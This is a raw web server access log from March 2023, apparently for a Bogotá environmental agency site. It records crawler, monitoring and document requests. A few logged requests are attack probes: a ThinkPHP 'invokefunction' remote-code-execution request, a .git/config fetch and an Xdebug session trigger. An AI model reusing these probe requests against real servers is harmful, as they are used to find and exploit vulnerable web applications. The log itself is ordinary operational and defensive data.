201.245.192.253 - - [27/Mar/2023:01:03:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
172.22.2.4 - - [27/Mar/2023:01:02:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:01:04:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:01:04:52 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2023:01:03:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [27/Mar/2023:01:05:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:06:16 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.111 - - [27/Mar/2023:01:06:43 -0500] "-" 408 -
192.168.175.240 - - [27/Mar/2023:01:07:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:08:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:01:08:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:01:09:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:01:09:52 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2023:01:08:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:01:10:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:01:09:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
192.168.175.240 - - [27/Mar/2023:01:11:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:12:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:13:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:01:13:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:01:14:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:01:14:52 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:01:15:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:01:14:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:01:16:16 -0500] "GET / HTTP/1.1" 200 4720
152.61.128.50 - - [27/Mar/2023:01:16:16 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [27/Mar/2023:01:16:17 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [27/Mar/2023:01:16:17 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [27/Mar/2023:01:15:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53551
192.168.175.240 - - [27/Mar/2023:01:17:16 -0500] "GET / HTTP/1.1" 200 4720
49.7.21.72 - - [27/Mar/2023:01:17:50 -0500] "-" 408 -
192.168.175.240 - - [27/Mar/2023:01:18:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:01:18:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:01:19:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:01:19:52 -0500] "HEAD / HTTP/1.1" 200 -
35.204.251.204 - - [27/Mar/2023:01:19:59 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.245.192.253 - - [27/Mar/2023:01:20:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42863
201.245.192.253 - - [27/Mar/2023:01:20:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43032
192.168.175.240 - - [27/Mar/2023:01:20:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:21:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:01:20:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
34.91.63.87 - - [27/Mar/2023:01:22:02 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [27/Mar/2023:01:22:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:01:20:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
74.125.210.215 - - [27/Mar/2023:01:23:13 -0500] "GET /Publicaciones/SSFFS-07337-2021.zip HTTP/1.1" 404 232
74.125.210.215 - - [27/Mar/2023:01:23:13 -0500] "GET /Publicaciones/SSFFS-16356-2021.zip HTTP/1.1" 404 232
64.233.172.4 - - [27/Mar/2023:01:23:13 -0500] "GET /Publicaciones/SSFFS-07827-2021.zip HTTP/1.1" 404 232
64.233.172.4 - - [27/Mar/2023:01:23:13 -0500] "GET /Publicaciones/SSFFS-11233-2021.zip HTTP/1.1" 404 232
64.233.172.4 - - [27/Mar/2023:01:23:14 -0500] "GET /Publicaciones/SSFFS-07673-2021.zip HTTP/1.1" 404 232
74.125.210.209 - - [27/Mar/2023:01:23:14 -0500] "GET /Publicaciones/SSFFS-10964-2021.zip HTTP/1.1" 404 232
74.125.210.209 - - [27/Mar/2023:01:23:15 -0500] "GET /Publicaciones/SSFFS-09984-2021.zip HTTP/1.1" 404 232
192.168.175.240 - - [27/Mar/2023:01:23:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:01:23:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:01:24:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:01:24:52 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:01:25:16 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.210 - - [27/Mar/2023:01:25:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/2195.pdf HTTP/1.1" 304 -
52.167.144.167 - - [27/Mar/2023:01:25:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5383.pdf HTTP/1.1" 200 346772
192.168.175.240 - - [27/Mar/2023:01:26:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:27:16 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.167 - - [27/Mar/2023:01:27:19 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2023%2F HTTP/1.1" 200 10548
172.22.2.4 - - [27/Mar/2023:01:25:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2023:01:28:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:01:28:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:01:26:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [27/Mar/2023:01:29:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:01:29:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2023:01:30:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42863
201.245.192.253 - - [27/Mar/2023:01:30:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43032
192.168.175.240 - - [27/Mar/2023:01:30:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:31:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:32:16 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.71 - - [27/Mar/2023:01:32:20 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12499
201.245.192.253 - - [27/Mar/2023:01:33:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:01:33:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:01:31:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:01:34:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:01:32:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
216.245.221.92 - - [27/Mar/2023:01:34:52 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:01:35:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:36:16 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.115 - - [27/Mar/2023:01:36:44 -0500] "-" 408 -
192.168.175.240 - - [27/Mar/2023:01:37:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:01:38:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:01:38:16 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.217 - - [27/Mar/2023:01:38:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/6613.pdf HTTP/1.1" 304 -
172.22.2.4 - - [27/Mar/2023:01:37:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:01:39:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:01:39:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2023:01:40:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42863
172.22.2.4 - - [27/Mar/2023:01:38:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
201.245.192.253 - - [27/Mar/2023:01:40:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43032
192.168.175.240 - - [27/Mar/2023:01:40:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:41:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:42:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:01:43:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:01:43:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:44:16 -0500] "GET / HTTP/1.1" 200 4720
49.7.21.72 - - [27/Mar/2023:01:44:39 -0500] "-" 408 -
216.245.221.92 - - [27/Mar/2023:01:44:52 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2023:01:43:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:01:45:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:01:44:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
192.168.175.240 - - [27/Mar/2023:01:46:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:47:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:01:47:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
201.245.192.253 - - [27/Mar/2023:01:48:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:01:48:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:49:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:01:49:52 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2023:01:50:14 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1018
192.168.175.240 - - [27/Mar/2023:01:50:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:01:49:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:01:51:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:01:50:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [27/Mar/2023:01:52:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:01:53:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:01:53:16 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.215 - - [27/Mar/2023:01:53:58 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2016%2F HTTP/1.1" 200 171136
192.168.175.240 - - [27/Mar/2023:01:54:16 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.71 - - [27/Mar/2023:01:54:21 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
216.245.221.92 - - [27/Mar/2023:01:54:52 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:01:55:16 -0500] "GET / HTTP/1.1" 200 4720
199.16.157.183 - - [27/Mar/2023:01:55:32 -0500] "-" 408 -
66.249.79.113 - - [27/Mar/2023:01:55:48 -0500] "-" 408 -
192.168.175.240 - - [27/Mar/2023:01:56:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:01:55:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:01:57:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:01:55:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
201.245.192.253 - - [27/Mar/2023:01:58:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:01:58:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:01:59:16 -0500] "GET / HTTP/1.1" 200 4720
186.28.27.244 - - [27/Mar/2023:01:59:18 -0500] "GET /Publicaciones/SSFFS-16172-2019.zip HTTP/1.1" 404 232
216.245.221.92 - - [27/Mar/2023:01:59:52 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2023:02:00:15 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
192.168.175.240 - - [27/Mar/2023:02:00:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:02:01:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:00:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55924
192.168.175.240 - - [27/Mar/2023:02:02:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:00:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2023:02:03:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
40.77.167.210 - - [27/Mar/2023:02:03:12 -0500] "GET /transparencia/New%20folder/1.%20EJECUCION%20RESERVAS%20ENERO%202020.pdf HTTP/1.1" 200 320160
192.168.175.240 - - [27/Mar/2023:02:03:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:01:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [27/Mar/2023:02:04:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:02:04:52 -0500] "HEAD / HTTP/1.1" 200 -
34.90.63.76 - - [27/Mar/2023:02:05:12 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [27/Mar/2023:02:05:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:02:06:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:06:35 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
66.249.79.111 - - [27/Mar/2023:02:06:45 -0500] "-" 408 -
192.168.175.240 - - [27/Mar/2023:02:07:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:08:07 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [27/Mar/2023:02:08:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:02:08:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:06:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2023:02:09:08 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [27/Mar/2023:02:09:09 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 200 39424
172.22.2.4 - - [27/Mar/2023:02:07:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50273
192.168.175.240 - - [27/Mar/2023:02:09:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:08:22 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 36811
216.245.221.92 - - [27/Mar/2023:02:09:52 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.217 - - [27/Mar/2023:02:10:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/5783.pdf HTTP/1.1" 304 -
192.168.175.240 - - [27/Mar/2023:02:10:16 -0500] "GET / HTTP/1.1" 200 4720
49.7.21.72 - - [27/Mar/2023:02:10:32 -0500] "-" 408 -
192.168.175.240 - - [27/Mar/2023:02:11:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:02:12:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:02:13:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:02:13:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:12:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:02:14:16 -0500] "GET / HTTP/1.1" 200 4720
34.141.134.15 - - [27/Mar/2023:02:14:33 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [27/Mar/2023:02:14:52 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2023:02:13:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [27/Mar/2023:02:15:16 -0500] "GET / HTTP/1.1" 200 4720
3.140.11.254 - - [27/Mar/2023:02:15:50 -0500] "HEAD /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:02:16:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:02:17:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:17:36 -0500] "GET /BLA/boletinlegal/explore HTTP/1.1" 404 1018
201.245.192.253 - - [27/Mar/2023:02:18:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:02:18:16 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.167 - - [27/Mar/2023:02:18:43 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2023%2F HTTP/1.1" 200 10548
192.168.175.240 - - [27/Mar/2023:02:19:16 -0500] "GET / HTTP/1.1" 200 4720
52.151.201.131 - - [27/Mar/2023:02:19:37 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
216.245.221.92 - - [27/Mar/2023:02:19:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2023:02:20:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43182
172.22.2.4 - - [27/Mar/2023:02:18:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2023:02:20:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43032
192.168.175.240 - - [27/Mar/2023:02:20:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:19:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [27/Mar/2023:02:21:16 -0500] "GET / HTTP/1.1" 200 4720
181.61.205.248 - - [27/Mar/2023:02:21:28 -0500] "GET /%C3%82%C2%BFquieres-aprender-sobre-jardines-verticales-esta-es-tu-oportunidad.html HTTP/1.1" 200 925
181.61.205.248 - - [27/Mar/2023:02:21:28 -0500] "GET /favicon.ico HTTP/1.1" 404 1136
192.168.175.240 - - [27/Mar/2023:02:22:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:21:45 -0500] "GET /BLA/boletinlegal/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 36811
201.245.192.253 - - [27/Mar/2023:02:23:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
64.233.172.1 - - [27/Mar/2023:02:23:14 -0500] "GET /Publicaciones/SSFFS-11604-2021.zip HTTP/1.1" 404 232
192.168.175.240 - - [27/Mar/2023:02:23:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:02:24:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:02:24:52 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.210 - - [27/Mar/2023:02:25:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/3463.pdf HTTP/1.1" 304 -
192.168.175.240 - - [27/Mar/2023:02:25:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:24:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:02:26:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:25:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
157.55.39.218 - - [27/Mar/2023:02:27:12 -0500] "GET /bogota-mantiene-alerta-fase-1-por-calidad-del-aire-y-adopta-algunas-medidas.html HTTP/1.1" 304 -
192.168.175.240 - - [27/Mar/2023:02:27:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:02:28:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:02:28:16 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.167 - - [27/Mar/2023:02:28:24 -0500] "GET /bla/resoluciones/index.php?dir=resoluciones+2003/res+2003+2101-2150 HTTP/1.1" 200 12160
192.168.175.240 - - [27/Mar/2023:02:29:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:02:29:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2023:02:30:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43182
201.245.192.253 - - [27/Mar/2023:02:30:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43032
192.168.175.240 - - [27/Mar/2023:02:30:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:02:31:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:30:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:02:32:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:30:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
201.245.192.253 - - [27/Mar/2023:02:33:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:02:33:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:02:34:16 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.115 - - [27/Mar/2023:02:34:20 -0500] "-" 408 -
216.245.221.92 - - [27/Mar/2023:02:34:52 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:02:35:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:02:36:16 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.210 - - [27/Mar/2023:02:36:35 -0500] "GET /forest/ HTTP/1.1" 200 12041
157.55.39.217 - - [27/Mar/2023:02:36:39 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12499
192.168.175.240 - - [27/Mar/2023:02:37:16 -0500] "GET / HTTP/1.1" 200 4720
49.7.21.72 - - [27/Mar/2023:02:37:36 -0500] "-" 408 -
172.22.2.4 - - [27/Mar/2023:02:35:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2023:02:38:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:02:38:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:36:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [27/Mar/2023:02:39:16 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.215 - - [27/Mar/2023:02:39:21 -0500] "GET /BLA/resoluciones/AUTOS%202017/2288.pdf HTTP/1.1" 200 2009556
52.167.144.165 - - [27/Mar/2023:02:39:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5530.pdf HTTP/1.1" 200 464060
216.245.221.92 - - [27/Mar/2023:02:39:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2023:02:40:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43182
201.245.192.253 - - [27/Mar/2023:02:40:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43032
192.168.175.240 - - [27/Mar/2023:02:40:16 -0500] "GET / HTTP/1.1" 200 4720
162.55.175.143 - - [27/Mar/2023:02:40:27 -0500] "GET / HTTP/1.1" 200 319
162.55.175.143 - - [27/Mar/2023:02:40:28 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:02:41:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:02:42:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:02:43:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:02:43:16 -0500] "GET / HTTP/1.1" 200 4720
35.204.251.204 - - [27/Mar/2023:02:43:19 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [27/Mar/2023:02:41:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
168.119.253.85 - - [27/Mar/2023:02:43:34 -0500] "GET / HTTP/1.1" 200 4720
168.119.253.85 - - [27/Mar/2023:02:43:35 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [27/Mar/2023:02:44:05 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [27/Mar/2023:02:42:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
192.168.175.240 - - [27/Mar/2023:02:44:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:02:44:52 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2023:02:45:06 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
192.168.175.240 - - [27/Mar/2023:02:45:16 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.100 - - [27/Mar/2023:02:45:25 -0500] "GET /Publicaciones/2022EE85940.pdf HTTP/1.1" 404 227
